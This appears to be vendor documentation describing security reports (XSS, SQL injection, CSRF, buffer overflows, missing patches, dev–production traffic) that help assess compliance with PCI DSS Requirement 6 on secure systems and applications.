6 – Maintain Secure Systems and Applications
In the Reports Portal, select > > > Reports or Dashboards > .
PCI Requirement 6 sets the expectation that you apply security patches to all applications and systems in the cardholder data environment (CDE) to protect them from malicious and unintentional misuse. The patches should be evaluated to ensure that they do not conflict with current security configurations. You must also ensure that in-house development teams practice secure coding techniques. Applications that store sensitive data must be able to protect the data.
To assess your enterprise's compliance with this requirement, use the following reports:
Broken Authentication and Session Management
Reports events associated with broken authentication and session management over time. The table provides results by the target asset, name and signature ID of the vulnerability, and the number of events.
Reports vulnerabilities associated with buffer overflows by CDE asset. This type of vulnerability occurs when a developer fails to appropriately manage memory for user-controlled data. A malicious user could put more data into a pre-allocated memory buffer than the buffer can hold, dramatically impacting the operation of a program. The table provides results by the affected asset, the detected vulnerability, the signature ID of the vulnerability, and when the most recent event occurred.
Configuration Modifications by Host
Reports modifications made to CDE assets. The table provides results by the affected asset, the type of modification, the user who made the change, the number of events, and when the most recent event occurred.
Reports assets that might be vulnerable to a cross-site request forgery (XSRF or CSRF) attack. In an CSRF attack, also known as a one-click attack or session riding, a malicious user submits unauthorized commands to a web application from a user account that the application trusts. The table provides results by the targeted asset and when the most recent event occurred.
Reports the signature ID of cross-site scripting (XSS) attacks by volume. Vulnerabilities associated with XSS enable malicious users to inject code in legitimate web pages or applications that executes harmful scripts in the user’s web browser when the browser parses data. The scripts might hijack user sessions, deface web sites, or redirect users to harmful sites. A web application or web page becomes vulnerable when it includes untrusted data; data without proper validation or escaping; or data supplied by users through an API that can create HTML or Java-script. XSS attacks tend to occur in forums, message boards, and web pages that allow comments. Malicious users can execute XSS attacks in VPSCript, ActiveX, Flash, and CSS. However, this type of injection attack most commonly occurs in Java Script. The table provides results by the signature ID of the event, the target asset, the number of events, and when the most recent event occurred.
Database Configuration Changes
Reports changes to the database configuration by affected asset. The table provides results by the database host, the modification made, the user who made the change, the number of changes, and when the most recent change occurred.
Reports vulnerabilities associated with improper access controls. The table provides results by the signature ID of the event, the target asset, the number of events, and when the most recent event occurred.
Reports vulnerabilities associated with improper handling of errors by affected assets. The table provides results by the signature ID of the event, the target asset, and when the most recent event occurred.
Reports the assets with the most injection flaws. The table provides results by the affected asset, the injection flaw and its signature ID, and when the event occurred.
Insecure Cryptographic Storage
Reports the IP addresses of systems where sensitive data is not stored securely. The table provides results by the affected asset, the event, the number of events, and when the most recent event occurred.
Meltdown or Spectre Vulnerable Assets
Reports the assets with the most Meltdown or Spectre vulnerabilities. The table provides results by the affected asset, the vulnerability and its signature ID, the number of events, and when the most recent event occurred.
Reports changes to operating systems. The table provides results by the target asset, the change, the outcome of the change, and the number of changes.
Outbound Communication from Development to Production
Reports all communication sent from the development environment to the production environment. The table provides results by the source and target addresses, the port used, the transportation protocol, and the number of events.
In the logical model, you must edit the isSourceZonePCIDevelopment and isDestinationZonePCIProduction variables to indicate the respective zones for development and production.
Outbound Communication from Production to Development
Reports all communication sent from the production environment to the development environment. The table provides results by the source and target addresses, the port used, the transportation protocol, and the number of events.
In the logical model, you must edit the isSourceZonePCIProduction and isDestinationZonePCIDevelopment variables to indicate the respective zones for production and development.
Reports assets by IP address with missing security patches. One of the most common ways to reduce your environment’s attack surface is to ensure that all systems have the most recent security patches applied. The table provides results by the affected asset, the vulnerability and signature ID associated with the missing patch, the number of events, and when the most recent event occurred.
Reports SQL injection vulnerabilities by asset. In a SQL injection attack, a malicious user can interfere with the queries that an application makes to its database. The user could view delete, or modify data not usually available for retrieval. A malicious user could also use SQL injections to start a denial-of-service attack or compromise other services, servers, or infrastructure. The table provides results by the target assets, the vulnerability and its signature ID, the number of events, and when the most recent event occurred.
Use of Custom Accounts in Production
Reports events in the production environment associated with the specified list of accounts. The table provides results by the specified accounts, the target asset, the number of events, and when the most recent event occurred.
You must enter the accounts that you want to include in the report. Use commas to separate the values.